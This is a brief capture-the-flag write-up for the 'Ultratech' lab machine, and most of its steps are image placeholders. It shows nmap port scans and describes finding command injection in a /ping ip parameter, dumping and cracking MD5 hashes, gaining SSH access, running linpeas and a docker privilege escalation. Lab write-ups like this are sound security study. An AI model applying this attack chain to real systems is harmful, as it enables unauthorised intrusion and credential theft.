Home CTF Writeups About

Ultratech

I like to scan all ports to check which are open. nmap <ip> -p- --open

images/150-1.png

I then perform a more specific and thorough scan, nmap <ip> -p 21, 22, 8081, 31331 -A

images/150-2.png

This site seems to be using an API. It seems the Node JS express framework is making a call to port 31331

images/150-3.png

Note the /ping provides a 500 respoonse showing a server error

images/150-4.png

images/150-5.png

images/150-6.png

Scanning the other port on 31331, shows some results

images/150-7.png

potential step on the jpeg

images/150-8.png

images/150-9.png

images/150-10.png

Potential users, I tried to brute force the web form using ffuf.

images/150-11.png

images/150-12.png

images/150-13.png

I will create a user list and brute this login page.

That did not work so I checked the hint, which told me to look closely at the /ping route on port 8081. I could see there was an ip parameter which connects to the box.

images/150-14.png

images/150-15.png

Found RCE, took a while and multiple trys using the various commands above.

images/150-16.png

Chained commands to dump the db data containing 2 MD5 hashes.

images/150-17.png

Cracked the hashes, crackstation.net is cool!

images/150-18.png

images/150-19.png

SSH access gained to r00t not root.

images/150-20.png

images/150-21.png

This was definately the time for Linpeas.

images/150-22.png

This red and yellow! Loving it.

images/150-23.png

Did my research on docker breakouts and privesc.

images/150-24.png

images/150-25.png

There was a change necessary alpine to bash